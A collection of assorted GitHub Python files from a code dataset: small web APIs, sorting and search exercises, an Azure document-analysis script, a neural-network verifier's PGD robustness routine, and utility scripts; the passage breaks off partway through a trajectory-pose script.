\"\"\"Select features for MA setting & flatten each UE's features.\"\"\"\r\n\r\n # get features for currently active UEs\r\n \"\"\" active = set([ue.ue_id for ue in env.active if not env.done])\r\n features = env.features()\r\n features = {ue_id: obs for ue_id, obs in features.items() if ue_id in active} \"\"\"\r\n\r\n # select observations for multi-agent setting from base feature set\r\n \"\"\" obs = {\r\n ue_id: [obs_dict[key] for key in cls.features]\r\n for ue_id, obs_dict in features.items()\r\n }\r\n \"\"\"\r\n # flatten each UE's Dict observation to vector representation\r\n \"\"\" obs = {\r\n ue_id: np.concatenate([o for o in ue_obs]) for ue_id, ue_obs in obs.items()\r\n } \"\"\"\r\n\r\n bundles = []\r\n for inp in env.inps:\r\n bundles.append([inp.inp_id, inp.bundle[\"storage\"], inp.bundle[\"vCPU\"]])\r\n\r\n observations = {\r\n sp.sp_id: {\r\n \"budget\": {sp.Budget},\r\n \"bundles\": bundles,\r\n \"tasks\": [[0 for _ in range(4)] for _ in range(env.NUM_USERS)],\r\n \"net-states\": [],\r\n }\r\n for sp in env.sps\r\n }\r\n\r\n for ue in env.users:\r\n observations[ue.current_sp][\"tasks\"][ue.ue_id] = [\r\n ue.ue_id,\r\n ue.task.computing_req,\r\n ue.task.data_req,\r\n ue.task.latency_req,\r\n ]\r\n\r\n for ue in env.users:\r\n for es in env.edge_servers:\r\n observations[ue.current_sp][\"net-states\"].append(\r\n [ue.ue_id, es.es_id, env.channel.snr(env.stations[es.bs_id], ue)]\r\n )\r\n\r\n print(observations[1][\"budget\"])\r\n return observations\r\n\r\n @classmethod\r\n def action(cls, env, action: Dict[int, int]):\r\n \"\"\"Base environment by default expects action dictionary.\"\"\"\r\n return action\r\n","repo_name":"0xdia/mobile-env","sub_path":"mobile_env/handlers/multi_agent.py","file_name":"multi_agent.py","file_ext":"py","file_size_in_byte":3592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"70943525353","text":"from app import app\nfrom app.database import db\nfrom app.database.models.timetable import Timetable\nfrom fastapi import Depends, Response, status\nfrom fastapi_jwt_auth import AuthJWT\nfrom pydantic import BaseModel\n\n\nclass RequestBody(BaseModel):\n subject_id: int\n meeting_link: str\n start_time: str\n duration: int\n day: str\n\n\n@app.post(\"/admin/add_timetable\")\nasync def add_timetable(\n body: RequestBody, response: Response, Auth: AuthJWT = Depends()\n):\n Auth.jwt_required()\n \n timetable = Timetable()\n timetable.subject_id = body.subject_id\n timetable.meeting_link = body.meeting_link\n timetable.start_time = body.start_time\n timetable.duration = body.duration\n timetable.day = body.day\n\n try:\n db.add(timetable)\n db.commit()\n except Exception as e:\n response.status_code = status.HTTP_503_UNAVAILABLE\n return {\"result\": \"fail\", \"reason\": str(e)}\n\n return {\"result\": \"ok\"}\n","repo_name":"himanshuvarandani/Electron-Server","sub_path":"app/routes/admin/add_timetable.py","file_name":"add_timetable.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25924481565","text":"import json\nfrom pypdf import PdfReader\n\n\nurl_test = './sample-pdf/sample_pdf.pdf'\nurl_test = './sample-pdf/sample_pdf-copy.pdf'\n# pdf = PdfReader('./sample-pdf/sample_pdf.pdf')\n\n# page_content = {\n# }\n\n# for indx, pdf_page in enumerate(pdf.pages):\n\n# \tpage_content[indx + 1] = pdf_page.extract_text()\n\n# print(page_content)\n\n\n\nfrom azure.core.exceptions import 
ResourceNotFoundError\nfrom azure.ai.formrecognizer import FormRecognizerClient, FormTrainingClient, DocumentAnalysisClient\nfrom azure.core.credentials import AzureKeyCredential\n\n\ncredentials = json.load(open('./pass_keys.json'))\n\nENDPOINT = credentials['ENDPOINT']\nAPIKEY = credentials['API-KEY']\n\n\n# DocumentAnalysisClient.begin\ndocument_analysis_client = DocumentAnalysisClient(ENDPOINT, AzureKeyCredential(APIKEY))\n\n\n# poller = form_client.begin_recognize_content_from_url(url_test)\n\n\nwith open(url_test, \"rb\") as f:\n poller = document_analysis_client.begin_analyze_document(\n \"prebuilt-document\", f.read(), pages='1, 5 '\n )\n\n# with open(url_test, 'rb') as f1:\n# \tfile_content = f1.read().decode('utf-8')\n# \tprint(file_content)\n\n# # import \n\nresult = poller.result()\n# json_string = json.dumps(result.__dict__, indent=4)\n\nimport pickle\n# with open('save.pkl' as )\nwith open('save.pkl', 'wb') as f:\n\tpickle.dump(result, f)\n\n\nwith open(url_test, \"rb\") as f:\n poller = document_analysis_client.begin_analyze_document(\n \"prebuilt-layout\", f.read()#, pages='1, 5 '\n )\n\nresult = poller.result()\n\nwith open('layout_build.pkl', 'wb') as f:\n\tpickle.dump(result, f)\n\n\n\n# Imprime la cadena JSON resultante\n# print(json_string)\n\n# text = ''\n# for page in result.pages:\n# \tfor line in page.lines:\n# \t\ttext+=line.content + ' '\n\n# text = text.strip()\n# print(text)\n\n# print(dir(result))\n# print(len(result.pages))\n# for page in result.pages:\n# print(\"----Analyzing layout from page #{}----\".format(page.page_number))\n# print(\n# \"Page has width: {} and height: {}, measured with unit: {}\".format(\n# page.width, page.height, page.unit\n# )\n# )\n","repo_name":"alexanderquispe/DigitalPillarAI","sub_path":"04_azure_recognizer/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18304677276","text":"from setuptools import setup\n\nwith open(\"README.rst\", \"r\") as f:\n description = f.read()\n\nversion_info = (0, 2, 5)\nversion = '.'.join(map(str, version_info))\n\nsetup(\n name='sqlalchemy-vertica',\n version=version,\n description='Vertica dialect for sqlalchemy',\n long_description=description,\n license='MIT',\n url='https://github.com/startappdev/sqlalchemy-vertica',\n download_url='https://github.com/startappdev/sqlalchemy-vertica/tarball/%s' % (version,),\n author='StartApp Inc.',\n author_email='ben.feinstein@startapp.com',\n packages=(\n 'sqlalchemy_vertica',\n ),\n install_requires=(\n 'six >= 1.10.0',\n 'sqlalchemy >= 1.1.11',\n ),\n extras_require={\n 'pyodbc': [\n 'pyodbc>=4.0.16',\n ],\n 'vertica-python': [\n 'psycopg2>=2.7.1',\n 'vertica-python>=0.7.3',\n ],\n },\n entry_points={\n 'sqlalchemy.dialects': [\n 'vertica.pyodbc = '\n 'sqlalchemy_vertica.dialect_pyodbc:VerticaDialect [pyodbc]',\n 'vertica.vertica_python = '\n 'sqlalchemy_vertica.dialect_vertica_python:VerticaDialect [vertica-python]',\n ]\n }\n)\n","repo_name":"taboola/sqlalchemy-vertica","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"40422607602","text":"import os\n\n\ndef display_details(i, rank):\n if i not in d.keys():\n print(\"No Student with this Roll Number.\")\n return\n print(\"Student Details =>\")\n print(\"Name:\", d[i][0])\n print(\"Roll Number:\", i)\n print(\"Marks -> \\tMaths:\", 
d[i][1][0], \"; CS:\",\n d[i][1][1], \"; Science:\", d[i][1][2])\n print(\"Mean Marks:\", d[i][2])\n print(\"Median Marks:\", d[i][3])\n print(\"Rank in Class:\", rank.index(d[i][1][3])+1)\n print(\"----------------\")\n\n\n# MAIN CODE\nd = dict() # FORMAT - [ROLL : [NAME,[MATH,CS,SCIENCE,TOTAL],MEAN,MEDIAN]]\nrank = list()\nn = int(input(\"Enter number of Students -> \"))\nfor i in range(n):\n print(\"Student\", i+1, \"Details =>\")\n roll = int(input(\"Enter Roll Number: \"))\n name = input(\"Enter Name of Student: \")\n marks = [int(input(\"Maths: \")), int(\n input(\"CS: \")), int(input(\"Science: \"))]\n marks += [(marks[0]+marks[1]+marks[2]), ]\n\n avg = (marks[3])/3\n median_list = list(marks)\n median_list.sort()\n rank += [marks[3], ]\n\n d[roll] = [name, marks, avg, median_list[1]]\n\nrank.sort(reverse=True)\n\n# Clearing the Screen\n# posix is os name for linux or mac\nif(os.name == 'posix'):\n os.system('clear')\n# else screen will be cleared for windows\nelse:\n os.system('cls')\n\nprint(\"HELLO\")\n\nwhile(True):\n print(\"\\nMENU (Enter Choice Number below) ->\\n1. Display list of users\")\n print(\"2. Display student details from Roll number\")\n print(\"3. Display student details from Name\")\n print(\"0. Exit\")\n choice = int(input(\"-> \"))\n if choice == 0:\n print(\"BYE BYE !!\")\n break\n elif choice == 1:\n print(\"Roll Number - Name\")\n for i in d:\n print(i, d[i][0], sep=\"\\t- \")\n print(\"----------------\")\n\n elif choice == 2:\n i = int(input(\"Enter Roll Number: \"))\n display_details(i, rank)\n\n elif choice == 3:\n name = input(\"Enter Name: \")\n found = False\n for i in d.keys():\n if d[i][0].lower() == name.lower():\n display_details(i, rank)\n found = True\n break\n if not found:\n print(\"Student not present with this Name.\")\n","repo_name":"b-beri/ISS","sub_path":"Assignment-3A/Question2.py","file_name":"Question2.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31614837534","text":"\"\"\"Quicksort\"\"\"\n\n\ndef partition(arr, low, high):\n pivot = arr[high]\n i = low - 1\n for j in range(low, high):\n if arr[j] < pivot:\n i = i + 1\n swap = arr[i]\n arr[i] = arr[j]\n arr[j] = swap\n swap = arr[i + 1]\n arr[i + 1] = arr[high]\n arr[high] = swap\n return i + 1\n\n\ndef quickSort(arr, low, high):\n\n if (low < high):\n \"\"\" pi is partitioning index, arr[pi] is now\n at right place \"\"\"\n pi = partition(arr, low, high)\n quickSort(arr, low, pi - 1) # Before pi\n quickSort(arr, pi + 1, high) # After pi\n\n\n# Print array\n\n\ndef printArray(arr):\n for i in range(len(arr)):\n print(arr[i], end=\" \")\n print()\n\n\narr = [5, 2, 3, 4, 1, 1, 2, 4, 50, 23, 12, 52, 12, 422, 112, 893212, 21,\n 23, 4, 4214, 421, 21312, 241, -1, -2311, 0, -213, 41212, 21, 2145, 657]\nprint(\"Before Sorting: \")\nprintArray(arr)\nquickSort(arr, 0, len(arr)-1)\nprint(\"After Sorting: \")\nprintArray(arr)\n","repo_name":"DevDey/Algorithms","sub_path":"Project_1/QuickSort.py","file_name":"QuickSort.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16569828844","text":"#lab10b\n\ntdict={}\nimport socket\nfrom time import sleep\n\ndef ctdict():\n l = int(input(\"enter the length of dictionary you want to enter: \"))\n for i in range(l):\n sname = input(\"Enter a website (URL): \")\n ipadd = socket.gethostbyname(sname)\n print(sname + \" \" + ipadd)\n 
tdict.update({sname: ipadd})\n print(tdict)\n\n\ndef b1():\n\n find=input(\"to check if it is in the dictionary enter a URL: \")\n if (find in tdict):\n print(find + \" is in the directory\")\n else:\n print(find + \" is not in the directory\")\n\ndef b2():\n adname = input(\"Enter a website (URL): \")\n adipadd = socket.gethostbyname(adname)\n tdict.update({adname: adipadd})\n print(adname + \" \" + adipadd + \" has been added to the directory\")\n print(tdict)\n\ndef b3():\n n = len(tdict)\n print(n)\n print(tdict.keys())\n a = input(\"enter the URL you want to delete from the directory: \")\n tdict.pop(a)\n print(\"the new directory is: \" + str(tdict))\ndef b4():\n n = len(tdict)\n print(n)\n print(tdict.keys())\n a = input(\"which URL you want to update the IP address?\\n\")\n u = input(\"enter the new IP address:\\n\")\n tdict.update({a: u})\n print(\"the new directory is: \" + str(tdict))\ndef b5():\n print(\"URL and IP for this dictionary are:\\n\")\n for k, v in tdict.items():\n print(k, v)\n\n\ndef b6():\n print(\"going back to main menu\")\n sleep(2)\n\n\ndef bmenu():\n ctdict()\n while(True):\n b_choice=input(\"Enter a number between 1-6 to choose from the following options\\n1. Search for a URL from a dictionary\\n2. Add a URL + IP address to a dictionary\\n3. delete a URL from a dictionary\\n4. Update the ip address of a specific URL\\n5. print all IP's to the screen\\n6. if you want to quit\\nenter your choice: \")\n if (b_choice == \"1\"):\n b1()\n elif(b_choice == \"2\"):\n b2()\n elif(b_choice == \"3\"):\n b3()\n elif (b_choice == \"4\"):\n b4()\n elif (b_choice == \"5\"):\n b5()\n elif (b_choice == \"6\"):\n b6()\n break\n else:\n print(\"invalid choice, please enter a number between 1-6\")\n continue","repo_name":"hweber01/DEVOPS","sub_path":"LESSON 04/LAB10B.py","file_name":"LAB10B.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24138810914","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None findValueMostElement largestValues\n\nfrom collections import deque\n\n\nclass Solution(object):\n\n def findValueMostElement(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n if not root:\n return []\n bfsList = [root]\n ret = []\n while len(bfsList):\n bfsList2 = []\n ret.append(max([i.val for i in bfsList]))\n for i in bfsList:\n # print i.val\n if i and i.left:\n bfsList2.append(i.left)\n if i and i.right:\n bfsList2.append(i.right)\n bfsList = bfsList2\n return ret\n\n def findValueMostElement(self, root):\n if not root:\n return []\n bfsList = deque([root])\n ret = []\n while len(bfsList):\n ret.append(max([i.val for i in bfsList]))\n for _ in range(len(bfsList)):\n i = bfsList.popleft()\n if i.left:\n bfsList.append(i.left)\n if i.right:\n bfsList.append(i.right)\n return ret\n","repo_name":"AlienceGG/LeetCode-3","sub_path":"problems/515.Find_Largest_Element_in_Each_Row/li_bfs.py","file_name":"li_bfs.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"27651418146","text":"import torch\n\nclass ProjectedGradientDescent:\n def __init__(self, config):\n self.config = config\n\n def start(self, prob):\n \"\"\"\n PGD (see Madry et al. 
2017): https://arxiv.org/pdf/1706.06083.pdf\n \n Arguments:\n prob:\n Verification Problem.\n Returns:\n A tensor for the adversarial example.\n \"\"\"\n true_label = prob.spec.is_adversarial_robustness()\n if true_label == -1:\n return None\n\n\n # Step size for attack iterations.\n eps_iter = prob.spec.input_node.bounds.get_range() / self.config.VERIFIER.PGD_EPS\n # Number of attack iterations\n num_iter = self.config.VERIFIER.PGD_NUM_ITER\n\n # Generate a uniformly random tensor within the specification bounds.\n distribution = torch.distributions.uniform.Uniform(\n prob.spec.input_node.bounds.lower,\n prob.spec.input_node.bounds.upper\n )\n adv = distribution.sample(torch.Size([1]))\n adv = torch.squeeze(adv, 0)\n \n # untargeted output\n y = torch.tensor([true_label])\n\n i = 0\n while i < num_iter:\n adv = self.fast_gradient_signed(\n prob,\n adv,\n eps_iter,\n y=y,\n targeted=False\n )\n\n adv = torch.clamp(\n adv,\n prob.spec.input_node.bounds.lower,\n prob.spec.input_node.bounds.upper\n )\n\n logits = prob.nn.forward(adv)\n if prob.spec.is_satisfied(logits, logits) is not True:\n return adv.detach()\n\n i += 1\n\n return None\n\n def fast_gradient_signed(\n self,\n prob,\n x,\n eps,\n y=None,\n targeted=False\n ):\n \"\"\"\n Fast Gradient Signed Method.\n\n Arguments: \n prob:\n Verification Problem.\n x:\n Input tensor.\n eps:\n Epsilon.\n y:\n The true output or the targeted output if targeted is set to true. \n targeted:\n Whether or not the attack is targeted.\n Returns: \n A tensor for the adversarial example.\n \"\"\"\n\n true_label = prob.spec.is_adversarial_robustness()\n if true_label == -1:\n raise NotImplementedError(\"PGD is supported only for Linf adversarial robustness\")\n\n assert torch.all(eps <= prob.spec.input_node.bounds.get_range())\n\n x = x.clone().detach().to(torch.float).requires_grad_(True)\n if y is None:\n y = torch.tensor([true_label])\n \n # Compute gradient\n loss_fn = torch.nn.CrossEntropyLoss()\n loss = loss_fn(prob.nn.forward(x)[None, :], y)\n if targeted:\n loss = -loss\n loss.backward()\n\n # compute perturbation\n perturbation = eps * torch.sign(x.grad)\n\n adv = torch.clamp(\n x + perturbation,\n prob.spec.input_node.bounds.lower,\n prob.spec.input_node.bounds.upper\n )\n\n return adv\n","repo_name":"vas-group-imperial/venus2","sub_path":"venus/verification/pgd.py","file_name":"pgd.py","file_ext":"py","file_size_in_byte":3156,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"15497390285","text":"from src.main.DB.DBConstants import DBConstants\nfrom src.main.Intents.IntentBase import IntentBase\nfrom src.main.DB.DBUtility import DBUtility\nfrom flask import session\n\nclass MostFileContainsBugs(IntentBase):\n def __init__(self, request):\n self.request = request\n\n def ProcessRespone(self):\n\n count = 1\n response = \"\"\n connection = DBUtility.getMYSQLConnection()\n try:\n with connection.cursor() as cursor:\n\n sql = 'SELECT DISTINCT(ClassID), count(ClassID) AS count FROM CommitClass left join GitInfo on CommitClass.CommitID=GitInfo.cHash where CommitClass.ProjectID=%s and GitInfo.contains_bug=TRUE GROUP BY ClassID HAVING count > 1 order by count DESC limit 10;'\n cursor.execute(sql, (session[\"projectID\"],))\n result = cursor.fetchone()\n while (result):\n response += str(count) + \"- \" + str(result[DBConstants.ClassID]) + \" has \" + str(result[\"count\"]) + \" buggy commits\" + \"\\n\\n\"\n result = cursor.fetchone()\n count += 1\n\n if response == \"\":\n response = \"Wow! 
There are no buggy files in the repo\"\n\n print(\"----------------RESULT------------------\")\n print(response)\n finally:\n connection.close()\n\n\n\n return response","repo_name":"ahmad-abdellatif/MSRBot","sub_path":"src/main/Intents/IssueIntents/MostFileContainsBugs.py","file_name":"MostFileContainsBugs.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"42684908239","text":"import numpy as np\nimport random\n#import math\n\ncount = 0\n\n# Read the file and use its first line to get the matrix size\n\nfilename = \"./Entradas/\"+input(\"Nome do arquivo: \")\n\narq = open(filename, 'r')\n#arq = open('./Entradas/Entrada 10.txt', 'r')\n\nprimeiraLinha = arq.readline()\narq.close()\nnumeroMatriz = int(primeiraLinha)\nauxM = np.zeros((numeroMatriz+1, numeroMatriz))\n\n#=============================================\n\n#arq = open('./Entradas/Entrada 10.txt', 'r')\narq = open(filename, 'r')\n\n# Transform the file data into a matrix\n\nfor linha in arq:\n auxLinha = linha\n Lista = auxLinha.split()\n nums = [int(s) for s in Lista]\n auxM[count,:] = nums[:]\n count = count+1\n\nauxM = np.delete(auxM, (0), 0)\n\nlistaPercorrida = []\nmaiorDistancia = numeroMatriz + 1\n\nwhile (len(listaPercorrida) < numeroMatriz):\n ca = random.randrange(0, numeroMatriz)\n listaPercorrida = []\n listaPercorrida.append(ca)\n \n menDis = 0\n \n while menDis < maiorDistancia:\n proxCidade = 0\n menDis = maiorDistancia\n for cd in range(numeroMatriz):\n for j in range(len(listaPercorrida)):\n if not(cd in listaPercorrida):\n if auxM[ca][cd] != 0:\n if auxM[ca][cd] < menDis:\n menDis = auxM[ca][cd]\n proxCidade = cd\n \n if menDis != maiorDistancia:\n listaPercorrida.append(proxCidade)\n ca = proxCidade\n print(len(listaPercorrida))","repo_name":"gus-rautenberg/TSP-tabu","sub_path":"tabuSearch.py","file_name":"tabuSearch.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8361371657","text":"\"\"\"View classes for the todo list.\"\"\"\nfrom datetime import datetime\nimport json\n\nfrom passlib.hash import pbkdf2_sha256 as hasher\n\nfrom tornado_todo.models import Profile, Task\n\nfrom tornado.gen import coroutine\nfrom tornado.web import RequestHandler\nfrom tornado_sqlalchemy import SessionMixin, as_future\n\n\nclass BaseHandler(RequestHandler, SessionMixin):\n \"\"\"Base request handler for all upcoming views.\"\"\"\n\n def prepare(self):\n \"\"\"Set up some attributes before any method receives the request.\"\"\"\n self.form_data = self._convert_to_unicode(self.request.arguments)\n self.response = {}\n\n def set_default_headers(self):\n \"\"\"Set the default response header to be JSON.\"\"\"\n self.set_header(\"Content-Type\", 'application/json; charset=\"utf-8\"')\n\n def send_response(self, data, status=200):\n \"\"\"Construct and send a JSON response with appropriate status code.\"\"\"\n self.set_status(status)\n self.write(json.dumps(data))\n\n def _convert_to_unicode(self, data_dict):\n \"\"\"Convert the incoming data dictionary to have unicode values.\"\"\"\n output = {key: [val.decode('utf8') for val in val_list] for key, val_list in data_dict.items()}\n return output\n\nclass AuthenticationMixin:\n # todo: extend \"prepare\" method to include authentication\n def prepare(self):\n authorized = self.get_current_user()\n if authorized:\n super().prepare()\n else:\n 
self.send_forbidden_response()\n self.finish()\n\n def get_current_user(self):\n token_cookie = self.get_secure_cookie('auth_token')\n if token_cookie:\n username, token = token_cookie.decode('utf8').split(':')\n with self.make_session() as session:\n profile = session.query(Profile).filter(Profile.username == username).first()\n if profile and profile.token == token:\n return True\n\n def authenticate_response(self, profile):\n token_cookie = f\"{profile.username}:{profile.token}\"\n self.set_secure_cookie('auth_token', token_cookie)\n\n def send_forbidden_response(self):\n data = {'error': 'You do not have permission to access this profile.'}\n self.set_status(403)\n self.write(json.dumps(data))\n\n\nclass InfoView(BaseHandler):\n \"\"\"Simple view to return route information.\"\"\"\n SUPPORTED_METHODS = (\"GET\",)\n\n def get(self):\n \"\"\"Handle a GET request for route information.\"\"\"\n routes = {\n 'info': 'GET /api/v1',\n 'register': 'POST /api/v1/accounts',\n 'single profile detail': 'GET /api/v1/accounts/',\n 'edit profile': 'PUT /api/v1/accounts/',\n 'delete profile': 'DELETE /api/v1/accounts/',\n 'login': 'POST /api/v1/accounts/login',\n 'logout': 'GET /api/v1/accounts/logout',\n \"user's tasks\": 'GET /api/v1/accounts//tasks',\n \"create task\": 'POST /api/v1/accounts//tasks',\n \"task detail\": 'GET /api/v1/accounts//tasks/',\n \"task update\": 'PUT /api/v1/accounts//tasks/',\n \"delete task\": 'DELETE /api/v1/accounts//tasks/'\n }\n self.write(json.dumps(routes))\n\n\nclass RegistrationView(BaseHandler):\n \"\"\"View for registering a new user.\"\"\"\n SUPPORTED_METHODS = (\"POST\",)\n\n @coroutine\n def post(self):\n \"\"\"Handle a POST request for user registration.\"\"\"\n needed = ['username', 'email', 'password', 'password2']\n if all([key in self.form_data for key in needed]):\n username = self.form_data['username'][0]\n with self.make_session() as session:\n profile = yield as_future(session.query(Profile).filter(Profile.username == username).first)\n if not profile:\n if self.form_data['password'] == self.form_data['password2']:\n self.build_profile(session)\n self.send_response({'msg': 'Profile created'}, status=201)\n else:\n self.send_response({'error': \"Passwords don't match\"}, status=400)\n\n def build_profile(self, session):\n \"\"\"Create new profile using information from incoming request.\"\"\"\n hashed_password = hasher.hash(self.form_data['password'][0])\n new_profile = Profile(\n username=self.form_data['username'][0],\n password=hashed_password,\n email=self.form_data['email'][0]\n )\n session.add(new_profile)\n session.commit()\n\n\nclass ProfileView(AuthenticationMixin, BaseHandler):\n \"\"\"View for reading or modifying an existing profile.\"\"\"\n SUPPORTED_METHODS = (\"GET\", \"PUT\", \"DELETE\")\n\n @coroutine\n def get(self, username):\n \"\"\"Handle incoming get request for a specific user's profile.\"\"\"\n with self.make_session() as session:\n profile = yield as_future(session.query(Profile).filter(Profile.username == username).first)\n if profile:\n self.authenticate_response(profile)\n self.send_response(profile.to_dict())\n else:\n self.send_response({'error': 'You do not have permission to access this profile.'}, status=403)\n\n @coroutine\n def put(self, username):\n \"\"\"Handle incoming put request to update a specific profile.\"\"\"\n with self.make_session() as session:\n profile = yield as_future(session.query(Profile).filter(Profile.username == username).first)\n if profile:\n if 'username' in self.form_data:\n profile.username = 
self.form_data['username'][0]\n if 'password' in self.form_data and 'password2' in self.form_data and self.form_data['password'] == self.form_data['password2'] and self.form_data['password'][0] != '':\n profile.password = hasher.hash(self.form_data['password'][0])\n if 'email' in self.form_data:\n profile.email = self.form_data['email'][0]\n session.add(profile)\n session.commit()\n self.authenticate_response(profile)\n self.send_response({\n 'msg': 'Profile updated.',\n 'profile': profile.to_dict(),\n 'username': profile.username\n }, status=202)\n else:\n self.send_response({'error': 'You do not have permission to access this profile.'}, status=403)\n\n @coroutine\n def delete(self, username):\n \"\"\"Delete an existing profile from the database.\"\"\"\n with self.make_session() as session:\n profile = yield as_future(session.query(Profile).filter(Profile.username == username).first)\n session.delete(profile)\n session.commit()\n self.send_response({}, status=204)\n\n\nclass TaskListView(AuthenticationMixin, BaseHandler):\n \"\"\"View for reading and adding new tasks.\"\"\"\n SUPPORTED_METHODS = (\"GET\", \"POST\",)\n\n @coroutine\n def get(self, username):\n \"\"\"Get all tasks for an existing user.\"\"\"\n with self.make_session() as session:\n profile = yield as_future(session.query(Profile).filter(Profile.username == username).first)\n if profile:\n tasks = [task.to_dict() for task in profile.tasks]\n self.authenticate_response(profile)\n self.send_response({\n 'username': profile.username,\n 'tasks': tasks\n })\n else:\n self.send_response({'error': 'The profile does not exist'}, status=404)\n\n @coroutine\n def post(self, username):\n \"\"\"Create a new task.\"\"\"\n with self.make_session() as session:\n profile = yield as_future(session.query(Profile).filter(Profile.username == username).first)\n if profile:\n due_date = self.form_data['due_date'][0]\n try:\n task = Task(\n name=self.form_data['name'][0],\n note=self.form_data['note'][0],\n creation_date=datetime.now(),\n due_date=datetime.strptime(due_date, '%d/%m/%Y %H:%M:%S') if due_date else None,\n completed=self.form_data['completed'][0],\n profile_id=profile.id,\n profile=profile\n )\n session.add(task)\n session.commit()\n self.authenticate_response(profile)\n self.send_response({'msg': 'posted'}, status=201)\n except KeyError:\n self.authenticate_response(profile)\n self.send_response({'error': 'Some fields are missing'}, 400)\n else:\n self.send_response({'error': 'You do not have permission to access this profile.'}, status=404)\n\n\nclass TaskView(AuthenticationMixin, BaseHandler):\n \"\"\"Request handling methods for an individual task.\"\"\"\n SUPPORTED_METHODS = (\"GET\", \"PUT\", \"DELETE\")\n\n @coroutine\n def get(self, username, task_id):\n \"\"\"Get detail for an existing task given a username and task id.\"\"\"\n with self.make_session() as session:\n profile = yield as_future(session.query(Profile).filter(Profile.username == username).first)\n if profile:\n task = yield as_future(session.query(Task).filter(Task.profile == profile, Task.id == task_id).first)\n if task:\n self.authenticate_response(profile)\n self.send_response({'username': username, 'task': task.to_dict()})\n else:\n self.authenticate_response(profile)\n self.send_response({'username': username, 'task': None}, status=404)\n else:\n self.send_response({'error': 'You do not have permission to access this data.'}, status=403)\n\n @coroutine\n def put(self, username, task_id):\n \"\"\"Update an existing task given a username and task id.\"\"\"\n with self.make_session() as session:\n 
profile = yield as_future(session.query(Profile).filter(Profile.username == username).first)\n if profile:\n task = yield as_future(session.query(Task).filter(Task.profile == profile, Task.id == task_id).first)\n if task:\n if 'name' in self.form_data:\n task.name = self.form_data['name'][0]\n if 'note' in self.form_data:\n task.note = self.form_data['note'][0]\n if 'completed' in self.form_data:\n task.completed = self.form_data['completed'][0]\n session.add(task)\n session.commit()\n self.authenticate_response(profile)\n self.send_response({'username': username, 'task': task.to_dict()}, status=202)\n else:\n self.authenticate_response(profile)\n self.send_response({'username': username, 'task': None}, status=404)\n else:\n self.send_response({'error': 'You do not have permission to access this data.'}, status=403)\n\n @coroutine\n def delete(self, username, task_id):\n \"\"\"Delete an existing task given a username and task id.\"\"\"\n with self.make_session() as session:\n profile = yield as_future(session.query(Profile).filter(Profile.username == username).first)\n if profile:\n task = yield as_future(session.query(Task).filter(Task.profile == profile, Task.id == task_id).first)\n if task:\n session.delete(task)\n session.commit()\n self.authenticate_response(profile)\n self.send_response({'username': username, 'msg': 'Deleted.'})\n else:\n self.send_response({'error': 'You do not have permission to access this data.'}, status=403)\n\n\nclass LoginView(BaseHandler):\n \"\"\"View for logging in.\"\"\"\n SUPPORTED_METHODS = (\"POST\",)\n\n @coroutine\n def post(self):\n \"\"\"Log a user in.\"\"\"\n needed = ['username', 'password']\n if all([key in self.form_data for key in needed]):\n with self.make_session() as session:\n profile = yield as_future(session.query(Profile).filter(Profile.username == self.form_data['username'][0]).first)\n if profile and hasher.verify(self.form_data['password'][0], profile.password):\n self.authenticate_response(profile)\n self.send_response({'msg': 'Authenticated'})\n else:\n self.send_response({'error': 'Incorrect username/password combination.'}, status=400)\n\n else:\n self.send_response({'error': 'Some fields are missing'}, status=400)\n\n\nclass LogoutView(BaseHandler):\n \"\"\"View for logging out.\"\"\"\n SUPPORTED_METHODS = (\"GET\",)\n\n def get(self):\n \"\"\"Log a user out.\"\"\"\n self.send_response({'msg': 'Logged out.'})\n","repo_name":"PythonToDoList/tornado","sub_path":"tornado_todo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12678,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"34230267898","text":"import torch\nimport pandas as pd\nimport os\nfrom scipy.spatial.transform import Rotation as R\nimport numpy as np\nfrom torch.utils.data import Dataset, DataLoader, IterableDataset\nfrom itertools import islice\nfrom matplotlib import pyplot as plt\nROOT_DIR = \"/data/beegfs/home/raichuna/thesis-fraunhofer-iis/Dataset\"\n\ndef normalize_quaternion(q):\n \"\"\"torch.norm defaults to the 2-norm (square root of the sum of squares).\"\"\"\n norm = torch.norm(q, dim=1)\n q_norm = torch.div(q, norm[:, None])\n return q_norm\n\ndef hamilton_product(quat1, quat2):\n a1, b1, c1, d1 = quat1\n a2, b2, c2, d2 = quat2\n q1 = a1*a2 - b1*b2 - c1*c2 - d1*d2\n q2 = a1*b2 + b1*a2 + c1*d2 - d1*c2\n q3 = a1*c2 - b1*d2 + c1*a2 + d1*b2\n q4 = a1*d2 + b1*c2 - c1*b2 + d1*a2\n return np.array([q1, q2, q3, q4])\n\ndef trajectory_poses(poses_predicted, initial_pose):\n final_poses = np.empty((0,7))\n #for x in islice(poses_predicted, 200):\n for x in poses_predicted:\n 